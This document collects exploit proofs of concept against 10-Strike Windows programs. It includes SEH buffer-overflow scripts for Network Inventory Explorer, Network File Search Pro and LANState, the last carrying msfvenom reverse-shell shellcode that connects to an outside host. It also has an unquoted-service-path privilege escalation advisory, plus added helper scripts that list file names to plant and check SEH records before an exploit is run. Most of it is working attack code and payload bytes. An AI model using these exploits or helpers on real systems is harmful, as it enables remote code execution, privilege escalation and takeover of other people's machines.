# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- Go to 'Main' or 'Computers'
# 5.- Click upon 'Add'
# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
# 7.- Click "OK"
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
buf += b"\x31\x75\x65\x50\x41\x41"
nseh = struct.pack("<I", 0x909006EB)
seh = struct.pack("<I", 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)
buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7
# Step to discover Unquoted Service Path:
C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto
# Service info:
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: srvInventoryWebServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : srvInventoryWebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
# Exploit:
# The service path above is unquoted and contains spaces, so when the SCM starts
# srvInventoryWebServer at boot (START_TYPE AUTO_START), CreateProcess tries
# C:\Program.exe, then C:\Program Files\10-Strike.exe, then
# C:\Program Files\10-Strike Network.exe and C:\Program Files\10-Strike Network Inventory.exe
# before reaching InventoryWebServer.exe; the first one that exists wins. A local user
# who can write to C:\ or to C:\Program Files\ (not the case with default ACLs, but common
# on hosts where those ACLs have been loosened) drops a binary under one of those names,
# keeps it from being removed by the OS or security software, and on the next reboot or
# service restart it runs as LocalSystem (SERVICE_START_NAME) instead of the application.
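The discovery step above is what you type on the box; the part worth automating is working out which file names are actually up for grabs. The following is an added example (not part of the advisory) that parses `sc qc` output like the one shown, lists the executables CreateProcess would try before the intended binary (each space in an unquoted path is a split point, with ".exe" appended, and the first hit wins), and reports which of those the current user could plant. The sample `sc qc` text is constructed from the advisory, the writability test is a pluggable callback (defaulting to `os.access`, a coarse stand-in for a real ACL check) so the logic runs off-Windows, and `ntpath` is used so `C:\` paths parse anywhere.

```python
#!/usr/bin/env python3
"""Find the hijack points behind an unquoted service path (added example)."""
import ntpath
import os
import re

# Constructed sample: the `sc qc srvInventoryWebServer` output from the advisory.
SAMPLE_SC_QC = r"""
SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text: str) -> dict:
    """Pick the KEY : value fields out of `sc qc` output."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def candidate_paths(binary_path: str) -> list:
    """Executables CreateProcess tries, in order, before the intended binary of an
    unquoted command line. Empty when the path is quoted or has no space.
    Stops at the first prefix that already names an .exe: what follows it is
    arguments, not more of the path."""
    path = binary_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
    return candidates


def hijack_points(binary_path: str, is_writable=None) -> list:
    """Candidates whose parent directory the current user can write to."""
    if is_writable is None:
        is_writable = lambda d: os.access(d, os.W_OK)  # coarse; check the ACL for real
    return [c for c in candidate_paths(binary_path) if is_writable(ntpath.dirname(c))]


def assess(sc_qc_output: str, is_writable=None) -> dict:
    """Summarise one service: who it runs as, whether it auto-starts, and where a
    planted binary would be picked up."""
    f = parse_sc_qc(sc_qc_output)
    path = f.get("BINARY_PATH_NAME", "")
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as": f.get("SERVICE_START_NAME"),
        "auto_start": f.get("START_TYPE", "").startswith("2"),
        "candidates": candidate_paths(path),
        "hijack_points": hijack_points(path, is_writable),
    }


if __name__ == "__main__":
    # Pretend only C:\Program Files is writable, as on a host with a loosened ACL.
    result = assess(SAMPLE_SC_QC, is_writable=lambda d: d.lower() == r"c:\program files")
    print("%s runs as %s, auto-start=%s" % (result["service"], result["runs_as"], result["auto_start"]))
    for c in result["candidates"]:
        print(("PLANT  " if c in result["hijack_points"] else "       ") + c)
```

On a real target replace the callback with an ACL check (`icacls` or `Get-Acl`): `os.access` does not understand Windows inheritance and will say `C:\` is writable when only folder creation is allowed there.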
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################
def write_poc(fname, buffer):
    fhandle = open(fname, 'wb')
    fhandle.write(buffer)
    fhandle.close()

fname = "poc.txt"
buf = b'\x41' * 0xfe0
#########################
# Shellcode
# MessageBox ad infinitum
#########################
# Decoded from the bytes: builds 0x00407E54 in ECX with a null-free XOR
# (0x41303F24 ^ 0x41704170), pushes four NULL dwords and RETs into that
# routine, the MessageBox call the author refers to.
shellcode = (b"\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
             b"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
             b"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
junk = b'\x41' * 0x5e
# nSEH slot: JMP SHORT -0x7E (-126 from nSEH+2), i.e. exactly
# len(shellcode) + len(junk) = 124 bytes back, onto the first shellcode byte.
jmp = b'\xeb\x82\x41\x41'
# SEH slot: handler address 0x004014EC, little-endian. Its null byte ends the
# registration-code string, so it has to be the last thing in the file.
nseh = b'\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)
# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/lanstate/download.shtml
# Version: 8.8
# Tested on: Windows 7 SP 1 x86
# Open LANState, File -> Open, browse to generated lsm file, boom shell.
# If it doesn't work first try, close the tab at the bottom and reopen the file
#!/usr/bin/python
lsm = """[VERSION INFO]
PROG_NAME=LANState
PROG_VER=8.85
MAP_VER=8.3
MAPID=584636991
[OBJECT#4]
index=4
ObjName=
ObjCaption={0}
ObjHint=
ObjLink=
POS_X=100
POS_Y=0
Width=65
Height=65
ImageWidth=31
ImageHeight=32
StdImageIndex=1
ImageFilePath=
FontName=Arial
FontColor=0
FontSize=8
FontCharset=1
FontStyle=0
TextAlignment=2
TextLayout=0
ObjType=1
OBJ_ID=1
TYPE_ID=2
IP=
REMOTE_NAME=A
MAP_NAME=
MAC_ADDR=
OS=
SNMPAgent=0
SNMPVer=1
SNMPUname=
SNMPPassw=
SNMPPrivPassw=
SNMPSecLevel=0
SNMPAuthType=0
SNMPPrivType=0
Community=
ALWAYS_ON=0
ImageEnabled=0
ImageFile=
IPList=
CurrentUser=
DESCRIPT=
CheckInterval=60
DownTime1=0
DownTime1Start=12:00:00 AM
DownTime1Finish=12:00:00 AM
DownTime2=0
DownTime2Start=12:00:00 AM
DownTime2Finish=12:00:00 AM
DownTime3=0
DownTime3Start=12:00:00 AM
DownTime3Finish=12:00:00 AM
DownTime4=0
DownTime4Start=12:00:00 AM
DownTime4Finish=12:00:00 AM
DownTime5=0
DownTime5Start=12:00:00 AM
DownTime5Finish=12:00:00 AM
DownTime6=0
DownTime6Start=12:00:00 AM
DownTime6Finish=12:00:00 AM
DownTime7=0
DownTime7Start=12:00:00 AM
DownTime7Finish=12:00:00 AM
DTDoNotAlert=1
RunFirstOnly=0
FirstIsPassed=1
CHECK#0/HostAddr={0}
CHECK#0/CID=1
CHECK#0/NumRetries=1
CHECK#0/RetInterval=30
CHECK#0/IsMainCheck=0
CHECK#0/KeepStat=1
CHECK#0/CheckType=0
CHECK#0/CheckOn=1
CHECK#0/CheckRTTime=0
CHECK#0/RTTime=1000
CHECK#0/PacketsCount=4
CHECK#0/TimeOut=500
CHECK#0/SizeBuf=32
[VIEW]
FonImage=0
FonImageFile=
ImagePosition=0
ImageOffsetX=16
ImageOffsetY=16
ImgW=0
ImgH=0
ImgAutoSize=1
ScaleFactor=1
ScrollX=0
ScrollY=0
BkGroundColor=16777215
FontName=Arial
FontColor=-16777208
FontSize=8
FontCharset=1
FontStyle=0
Gradient=0
Color1=15780518
Color2=16777215
WebUseSmallIcons=0
CurIconSize=32
LockAreas=0
LockLines=0
LockHosts=0
WindowState=2
WindowTop=-10
WindowsLeft=12
WindowWidth=800
WindowsHeight=600
"""
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
shellcode = ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70"
shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61"
shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b"
shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b"
shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46"
shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c"
shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d"
shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77"
shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c"
shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68"
shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70"
shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63"
shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51"
shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f"
shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75"
shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d"
shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78"
shellcode += "\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c"
shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63"
shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69"
shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71"
shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f"
shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30"
shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34"
shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f"
shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30"
shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69"
shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70"
shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30"
shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50"
shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48"
shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42"
shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a"
shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75"
shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50"
shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55"
shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36"
shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44"
shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47"
shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76"
shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74"
shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54"
shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70"
shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e"
shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79"
shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79"
shellcode += "\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70"
shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f"
shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66"
shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f"
shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70"
shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77"
shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63"
shellcode += "\x79\x6f\x6e\x35\x41\x41"
# The msfvenom output above is a Python 2 str; turn it into bytes so it concatenates
# with the raw handler address below (0xBA in it is not valid text on Python 3).
shellcode = shellcode.encode("latin-1")
# Stub reached from nSEH. The shellcode was encoded with BufferRegister=EDI, so EDI
# must point at it; the three ADD immediates sum to 0x124 (mod 2**32), split that way
# because a single ADD EAX,0x124 would carry null bytes.
align_stack = b'\x58'                   # POP EAX
align_stack += b'\x58'                  # POP EAX
align_stack += b'\x05\x61\x55\x55\x55'  # ADD EAX,55555561
align_stack += b'\x05\x61\x55\x55\x55'  # ADD EAX,55555561
align_stack += b'\x05\x62\x56\x55\x55'  # ADD EAX,55555662
align_stack += b'\x50'                  # PUSH EAX
align_stack += b'\x5f'                  # POP EDI
# nSEH: JNO +6 / JO +4. Whichever way the overflow flag is set, execution lands
# 8 bytes past nSEH, i.e. at align_stack, with no null byte in the record
# ("JMP always true").
nseh = b'\x71\x06\x70\x04'
# 01BA7647 POP POP RET LANState.exe
seh = b'\x47\x76\xba\x01'
payload = b'\x41' * 235
payload += nseh
payload += seh
payload += align_stack
payload += b'\x41' * 265
payload += shellcode
payload += b'\x41' * (3492 - len(shellcode + align_stack))
# The map template is text; round-trip the payload through latin-1 so every byte
# of it reaches the file unchanged.
buffer = lsm.format(payload.decode("latin-1")).encode("latin-1")
with open('sploit.lsm', 'wb') as f:
    print("Size: " + str(len(payload)) + " bytes")
    f.write(buffer)
print("Map file created!")
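The three SEH PoCs above (Network Inventory Explorer, Network File Search Pro, LANState) all depend on the same handful of invariants: the four nSEH bytes must, when executed, land somewhere the attacker controls; the handler address must not contain a character the input path strips or truncates on, or must be the last thing in the buffer if it does (the File Search PoC's 0x004014EC); and any register-adjustment stub must add up to the intended delta without null bytes (the LANState align_stack). The following is an added example, not code from any of the three exploits, that checks those properties statically. It decodes EB (JMP SHORT), 90 and the OF-based 70/71 pair used as the "JMP always true", tracking the overflow flag so the JNO/JO pair is seen never to fall through into the handler address. The bad-character set `\x00\x0a\x0d` is an assumption for text-file input, and the File Search record uses `S`/`J` placeholder bytes for its 30-byte shellcode and 0x5E-byte junk; the offsets and addresses are the ones in the PoCs.

```python
#!/usr/bin/env python3
"""Static checks for SEH overwrite records (added example, not from the PoCs)."""
import struct


def nseh_landings(nseh: bytes) -> set:
    """Offsets, relative to the first nSEH byte, where execution can be once the
    nSEH bytes have run. Handles 90 (NOP), EB (JMP SHORT) and 70/71 (JO/JNO).
    Both outcomes of a conditional jump are explored, but OF is tracked, so a
    JNO/JO pair cannot be reported as falling through."""
    landings, work = set(), [(0, None)]          # (pc, OF); None = unknown
    while work:
        pc, of = work.pop()
        if pc >= len(nseh):                      # ran off the end of nSEH
            landings.add(pc)
            continue
        op = nseh[pc]
        if op == 0x90:
            work.append((pc + 1, of))
            continue
        if op not in (0xEB, 0x70, 0x71) or pc + 1 >= len(nseh):
            raise ValueError("unhandled byte %#04x at nSEH+%d" % (op, pc))
        target = pc + 2 + struct.unpack("<b", nseh[pc + 1:pc + 2])[0]
        if op == 0xEB:
            landings.add(target)
            continue
        taken_when = (op == 0x70)                # JO taken if OF=1, JNO if OF=0
        for flag in ((True, False) if of is None else (of,)):
            if flag == taken_when:
                landings.add(target)
            else:
                work.append((pc + 2, flag))
    return landings


def has_bad_bytes(value: bytes, badchars: bytes = b"\x00\x0a\x0d") -> bool:
    return any(b in badchars for b in value)


def has_null_imm(value: int) -> bool:
    """True if the little-endian imm32 encoding of value contains 0x00."""
    return 0 in struct.pack("<I", value)


def add_chain_delta(immediates) -> int:
    """Net change to EAX after one ADD EAX,imm32 per immediate, modulo 2**32."""
    return sum(immediates) & 0xFFFFFFFF


def null_free_add_chain(delta: int, parts: int = 3) -> list:
    """Split a small delta into `parts` immediates that sum to it mod 2**32 and
    contain no 0x00 byte, the trick the LANState align_stack uses."""
    for tweak in range(0x100):
        head = [0x55555555 + tweak] * (parts - 1)
        chain = head + [(delta - sum(head)) & 0xFFFFFFFF]
        if not any(has_null_imm(v) for v in chain):
            return chain
    raise ValueError("no null-free split for %#x" % delta)


def build_seh_record(prefix: bytes, nseh: bytes, handler: int, tail: bytes = b"",
                     badchars: bytes = b"\x00\x0a\x0d") -> bytes:
    """prefix + nSEH + handler + tail, or ValueError when the record cannot work:
    a bad character in nSEH, a bad character in the handler with data after it,
    or an nSEH jump that lands outside the controlled bytes."""
    if len(nseh) != 4:
        raise ValueError("nSEH must be exactly 4 bytes")
    if has_bad_bytes(nseh, badchars):
        raise ValueError("nSEH contains a bad character")
    seh = struct.pack("<I", handler)
    if has_bad_bytes(seh, badchars) and tail:
        raise ValueError("handler %#010x has a bad character; nothing may follow it" % handler)
    for land in nseh_landings(nseh):
        if not (-len(prefix) <= land < 4 or 8 <= land < 8 + len(tail)):
            raise ValueError("nSEH lands at %+d, outside the controlled data" % land)
    return prefix + nseh + seh + tail


def poc_records() -> dict:
    """The three records from the PoCs above. Shellcode and junk are placeholder
    bytes (constructed here); only lengths, nSEH bytes and handlers are real."""
    inv = build_seh_record(b"A" * 211, struct.pack("<I", 0x909006EB), 0x61E8497A, b"A" * 20)
    nfs = build_seh_record(b"A" * 0xFE0 + b"S" * 30 + b"J" * 0x5E, b"\xeb\x82\x41\x41", 0x004014EC)
    lan = build_seh_record(b"A" * 235, b"\x71\x06\x70\x04", 0x01BA7647, b"\x58\x58" + b"A" * 265)
    return {"inventory": inv, "filesearch": nfs, "lanstate": lan}


if __name__ == "__main__":
    for name, rec in poc_records().items():
        print("%-10s %d bytes" % (name, len(rec)))
    print("EB 06 90 90 lands at", nseh_landings(struct.pack("<I", 0x909006EB)))
    print("71 06 70 04 lands at", nseh_landings(b"\x71\x06\x70\x04"))
    print("align_stack delta = %#x" % add_chain_delta([0x55555561, 0x55555561, 0x55555662]))
    print("null-free split of 0x124:", [hex(v) for v in null_free_add_chain(0x124)])
```

Run it before spending time in a debugger: a record that fails here (a handler with a `\x00` followed by shellcode, an nSEH that falls into the handler bytes) will not work no matter how good the pop/pop/ret is.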